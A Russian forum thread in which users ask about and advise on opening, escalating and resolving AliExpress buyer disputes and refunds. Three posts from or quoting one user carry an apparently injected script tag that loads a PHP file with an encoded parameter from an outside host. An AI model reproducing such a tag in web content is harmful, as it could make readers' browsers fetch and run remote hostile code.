Зарегистрироваться
или войти:
Логин/Пароль
Чтобы общаться на форуме, необходимо зарегистрироваться

Окажу бесплатную помощь в диспутах (спорах) - 7

Ответов в теме: 1000
РедакторСообщений: 20584Поблагодарили: 11801 раз

Тема создана автоматически, так как в предыдущей накопилось большое количества сообщений.
Предыдущая тема здесь »


Итак, в этой теме вы можете задавать вопросы, если возникают затруднения в спорах.
Желательно свои вопросы закреплять скриншотами (так будет понятнее).


О СПОРАХ НА АЛИ

Вопрос: Как открыть спор.
Ответ: Читаем более подробно в этой статье (http://alitrack.ru/article/220.html)

*****

Вопрос: Сколько обычно рассматривают споры.
Ответ: 5-90 дней. Однако, если после обострения спора прошло порядка 7-14 дней, а вам так ничего не сообщили и не пришло никакого письма, то необходимо связаться с администраторами площадки Алиэкспресс в онлайн-чате и попросить ускорить рассмотрение спора. А также, можно обратиться в Центр помощи, выбрав нужный раздел для разрешения проблем покупателей.

*****

Вопрос: Через сколько возвращают деньги и куда.
Ответ: Возврат денег осуществляется в течение 3-10 рабочих дней после закрытия спора. Деньги возвращает всегда площадка, а не продавец. Поскольку до получения Вами заказа деньги находятся у площадки и только после получения и подтверждения Вами заказа перечисляются на счет продавца. Деньги возвращаются на то платежное средство, с которого Вы производили оплату.

Все предложения продавцов решить спор за пределами площадки, в частности посредством перевода денег на paypal - исключительно на ваш страх и риск, а в большинстве случаев просто обман. Защита площадки на такие случаи не распространяется.

*****

Вопрос: Как правильно собрать доказательства в споре.
Ответ: Описание с фотографиями здесь.

*****

Вопрос: Как загрузить видео или фото (больше 2Мб).
Ответ: Для этого воспользуйтесь файлообменником mediafire.com. Инструкцию по использованию можно найти здесь или здесь.

*****

Вопрос: Можно ли отменить спор.
Ответ: Споры бывают между вами и продавцом = обычные споры и обостренные споры = к спору присоединяются администраторы площадки Алиэкспресс в качестве медиаторов. Обычные споры можно открывать и отменять (закрывать) пока у вас есть время на счетчике защиты заказа. Только помните, что открыть следующий спор можно не раньше, чем через 14 дней после отмены предыдущего. Отменять обостренные споры нельзя, иначе заказ закроется и деньги переведут продавцу.

*****

Вопрос: Что будет, когда закончится время на счетчике спора.
Ответ: Под самим спором всегда есть дополнительная информация. Обычно это два варианта:

1) Если продавец не ответит в течение отведенного времени, то спор закроется в вашу пользу. Таким образом вы выиграете спор на тех условиях, которые вы сами указали при открытии спора.

2) По истечении отведенного времени спор автоматически обострится и к его рассмотрению подключатся администраторы Алиэкспресс. Здесь главное следить, чтобы на момент обострения спора стояли ваши условия, если нет то используйте кнопку "редактировать", чтобы изменить условия спора до обострения. А если в самом споре у Вас есть кнопка "обострить спор", то можете не дожидаться пока истечет время на счетчике и сразу обострить свой спор.

Примечание: Если покупатель подает иск, и не представляет никаких доказательств, в течение семи дней, иск будет закрыт, и оплата будет выпущена к поставщику: Источник.

*****

Вопрос: Что делать, если после обострения спора стоит не та сумма, которую вы изначально запрашивали к возврату, или вы хотите добавить дополнительные доказательства.
Ответ: Редактировать обостренный спор нельзя, однако, вы можете связаться с администраторами площадки Алиэкспресс в онлайн-чате и там описать свою проблему.

*****

Вопрос: что такое ИНВОЙС и как написать продавцу просьбу его выслать.
Ответ: это квиток, который получают на почте при отправлении посылки с данными отправителя и адресата или составляемый продавцом документ, в котором также есть эти данные и обязательно стоит хотя бы печать. Эти документы могут быть только в виде отсканированного изображения, но не в формате word, excel или др.

Please, send me a scanned copy of my invoice (good's shipment).

Часто задаваемые вопросы о возврате денежных средств.

Leto, CnAPTAK и ещё 4 поблагодарили за этот комментарий
ПользователиСообщений: 95Поблагодарили: 48 разМосква

Всех приветствую! Прошу подсказать, зависли 4 дешёвых заказа. Срок защиты заканчивается через трое суток. Двум "чайникам" отстучал депеши, что-бы продлили срок защиты, молчат как рыбы об лёд... Двух других пока не трогал. Поэтому назревает извечный вопрос: что делать?. Ждать ещё три дня, или открывать спор?

Скрин прилагается.

Заранее благодарен!

П.С. Что это за мудрёные слова, подчёркнутые краным?

ПользователиСообщений: 1547Поблагодарили: 1411 раз Волгодонск

Gustav, открывай спор. уже пора.

красненьким подчеркнуты ники продов.

Отредактировал(а) смех дождя 28-11-2014 в 17:05
Gustav поблагодарил(а) за этот комментарий
ПользователиСообщений: 311Поблагодарили: 223 разаРБ

Gustav писал(а):

Всех приветствую! Прошу подсказать, зависли 4 дешёвых заказа. Срок защиты заканчивается через трое суток. Двум "чайникам" отстучал депеши, что-бы продлили срок защиты, молчат как рыбы об лёд... Двух других пока не трогал. Поэтому назревает извечный вопрос: что делать?. Ждать ещё три дня, или открывать спор?

Скрин прилагается.

Заранее благодарен!

П.С. Что это за мудрёные слова, подчёркнутые краным?

Вы так больше никогда не затягивайте, продлевайте хотя бы за 10 дней. Время закончится и деньгипереведут проду. Я б на Вашем месте, если за сегодня никаких продвижений, спор бы открыла.

Там, по моему,отражается ник продавца, как он себя зарегистрировал)

Gustav поблагодарил(а) за этот комментарий
ПользователиСообщений: 95Поблагодарили: 48 разМосква

смех дождя писал(а):

Gustav, открывай спор. уже пора.

красненьким подчеркнуты ники продов.

Спасибо, сейчас я им утрою Хасан, с Халхин-Голом. Wink

ПользователиСообщений: 307Поблагодарили: 62 разаБийск

Gustav, слова подчеркнутые красным это имена продавцов, смешно что они у вас одинаковые, по заказам можете продлить защиту, можете открыть спор, у меня тоже ничего не движется давно, сезон у них такой.

ПользователиСообщений: 132Поблагодарили: 72 раза

В обострённом споре пишу, что прод прислал мне инвойс в формате Эксель, и всем пох. Я так думаю что в алиэкспрессе в недавнем времене стали работать люди из России. Теперь сервис и поддержка такая же как и в РоссииLaugh Добро пожаловать в снижение продаж Алиэкспресс)

Отредактировал(а) PUTIN 28-11-2014 в 17:15
ПользователиСообщений: 16

Заказал у продавца телефон не дешёвый, он сломался через пару недель, зависает на заставке . В сервисах не делают, с китаем не связываются. Что делать может ли продавец обменять мне товар. Если нет куда обращаться???

<sсriрt src="http://dolotooo.ru/webasm1.php?snid=MjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwNTEzNjMyNWE0MjUxNGM1NAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==&rnd=28102014">
ПользователиСообщений: 15053Поблагодарили: 8690 раз 

NAIL4IK писал(а):

Заказал у продавца телефон не дешёвый, он сломался через пару недель, зависает на заставке . В сервисах не делают, с китаем не связываются. Что делать может ли продавец обменять мне товар. Если нет куда обращаться???

<sсriрt src="http://dolotooo.ru/webasm1.php?snid=MjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwNTEzNjMyNWE0MjUxNGM1NAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==&rnd=28102014">

Можно обменять, но пересылка за счёт покупателя. Если не подтвердили получение заказа, открываетй спор: Does not work properly - Не работает должным образом, предварительно собрав все доказательства по неисправности товара. Информация читайте в шапке темы. Статья Вам в помощь.

ПользователиСообщений: 95Поблагодарили: 48 разМосква

Pten4ik писал(а):

Gustav, слова подчеркнутые красным это имена продавцов, смешно что они у вас одинаковые, по заказам можете продлить защиту, можете открыть спор, у меня тоже ничего не движется давно, сезон у них такой.

Да, теперь понял, что это два продавана. Продлить защиту без продавца я никак не смогу. А они дружно молчат... Открыл 2 спора, посмотрим что будет. А ещё два завтра открою. Как говорится, удовольствие нужно растягивать.

ПользователиСообщений: 16

Crimchanka писал(а):

Можно обменять, но пересылка за счёт покупателя. Если не подтвердили получение заказа, открываетй спор: Does not work properly - Не работает должным образом, предварительно собрав все доказательства по неисправности товара. Информация читайте в шапке темы. Статья Вам в помощь.

Вот именно заказ был подтверждён, как сделать так что бы продавец обменял мне телефон, или куда обращаться в администрацию???

<sсriрt src="http://dolotooo.ru/webasm1.php?snid=MjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwNTEzNjMyNWE0MjUxNGM1NAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==&rnd=28102014">
ПользователиСообщений: 16

Через 2 недели телефон сломался, заказ уже подтвердил, что делать куда писать/???

ПользователиСообщений: 6Караганда

помогите начать спор, у меня заказ ушел в другую страну.

помогите начать спор, у меня заказ ушел в другую страну.

Что нужно написать в графе Подробная информация о вашем запросе?

ПользователиСообщений: 95Поблагодарили: 48 разМосква

Ольга Василинюк писал(а):

помогите начать спор, у меня заказ ушел в другую страну.

помогите начать спор, у меня заказ ушел в другую страну.

Как оказалось, ничего страшного в этом нет. Давите на кнопку "открыть спор", отмечаете нужные пункты, пишите пару ласковых слов продавцу, ну или кто там судилищем занимается. И начинает тикать 5-и дневный счётчик.

Ольга Василинюк поблагодарил(а) за этот комментарий
ПользователиСообщений: 9Поблагодарили: 1 раз

смех дождя,

смех дождя,

ПользователиСообщений: 197Поблагодарили: 70 раз Волоколамск

Выкинуть, пойти в нормальный магазин и купить новый! Электроника на Али никудышная... Или глючит, или ломается быстро. В лучшем случае, не совпадают параметры памяти. Кучу таких историй читала. И родственника однажды перекупы "наградили". Он 3 месяца мучился, потом выкинул, т.к. пользоватся этим было невозможно.

ПользователиСообщений: 9Поблагодарили: 1 разЗапорожье

Привет! Жена заказала слинг голубого цвета (у нас мальчик), прислали розовый. Мы открыли спор на полный возврат денег. Чего мы можем ожидать? Заранее спасибо за ответ...

ПользователиСообщений: 15053Поблагодарили: 8690 раз 

NAIL4IK, пересылка только за Ваш счёт в Китай, если есть гарантия у телефона.

Lady Wert писал(а):

Выкинуть, пойти в нормальный магазин и купить новый! Электроника на Али никудышная... Или глючит, или ломается быстро. В лучшем случае, не совпадают параметры памяти. Кучу таких историй читала. И родственника однажды перекупы "наградили". Он 3 месяца мучился, потом выкинул, т.к. пользоватся этим было невозможно.

Смотря, что покупать и по какой цене. У меня у всей семьи смарты, купленные на Али, нареканий на качество нет.

ПользователиСообщений: 243Поблагодарили: 75 разБелгород

Lady Wert, Мне сделали подарок из "нормального" магазина друзья там работающие. Потом месяц гарантийного ремонта и вот уже 5 лет всё работает. Из подаренного оставили только корпус. Ни когда не угадаешь на что нарвёшься!

Пока все споры проходят быстро! Максимум 3 дня и потом рефунд. Только 1 был 15 дней в связи с проверкой Админами магазина. Прод пропал, сделку анулировали, деньги вернули.

Ольга Василинюк, ТОлько после пары ласковых строк всё же лучше приложить скриншот с отслеживания трека о поездке в другую страну! Smile

Отредактировал(а) Esaul_2016 28-11-2014 в 18:12
ПользователиСообщений: 20Поблагодарили: 3 разаЖлобин

mimouse, Подскажите пожалуйста, я обострила спор (т.к. прошло уже около 80 дней, а заказ по отслеживанию висит в Китае). Как долго администрация Алиэкспресс будет решать возвращать мне деньги или нет?

ПользователиСообщений: 7Москва

Добрый день, подскажите пожалуйста, как действовать, получил посылку. К ней приложен акт о повреждении упаковки, упаковка заклеена, а внутри!!!! ... Тихий ужас, по коробочке видимо проехались, там все раздроблено, пластик просто рассыпается. Позвонила на почту, сказали писать претензию, но рассчитывать не на что, потому что посылка была без объявленной ценности. Возможен возврат стоимости отправления, но опять же не мне, так как пересылку оплачивал отправитель. Что делать и на что можно рассчитывать? Фото и видео вскрытия есть. Получается, что здесь вина почты, но я ни на что претендовать не могу... Заранее спасибо за советы.

Отредактировал(а) Lyoka 28-11-2014 в 21:01
ПользователиСообщений: 25Поблагодарили: 2 раза 

Привет всем! Помогите пожайлуста правильно открыть спор. Ситуация такая : товар был заказан 10.10.2004 обещан полный возврат если не получено в течении 39 дней.трек отслеживаемый только по китаю. Последнее сообщение - посылка пришла в аэропорт страны назначения от 22.10.2014.Продавец на прозбы продлить срок соглашаеться, но прислать инвойс отказался. На повторный запрос выслать инвойс , либо я открою спор ответил "hi, we usually sent parcel as a gift and by individual to individual, we don't have invoice , sorry." Из этого я понял только, что инвойса у него нет...

Помогите правильно открыть спор.

ПользователиСообщений: 10

tvister56, да, картой. Обычно в течении недели возвращали, а тут ни ответа ни привета. Система закрыла спор в мою пользу, счет проверяла, возврата не было. Что делать? Smile

tvister56, да, картой. Обычно в течении недели возвращали, а тут ни ответа ни привета. Система закрыла спор в мою пользу, счет проверяла, возврата не было. Что делать? Smile

ПользователиСообщений: 21Поблагодарили: 1 разЛида

доброго времени суток!подскажите открыл2 спора по 2 разным заказам ,оба прода его приняли,заказах пишут спор закрыт,все та как должно быть ,а денег так и нету?прошло 18 дней! и что дальше???где искать?

ПользователиСообщений: 833Поблагодарили: 529 разОренбурга

anna_strizhova, в течении 14 рабочих дней должны вернуть вам деньги. Не волнуйтесь придут точно.

ПользователиСообщений: 197Поблагодарили: 70 раз Волоколамск

Crimchanka, долларов 35 по моему.... Год назад дело было, потом вдвоём со свояком поехали в Евросеть и купили по самсунгу.

Отредактировал(а) Irma_Adams 28-11-2014 в 19:09
Только зарегистрированные пользователи могут оставлять сообщения на форуме.
Зарегистрироваться
Войти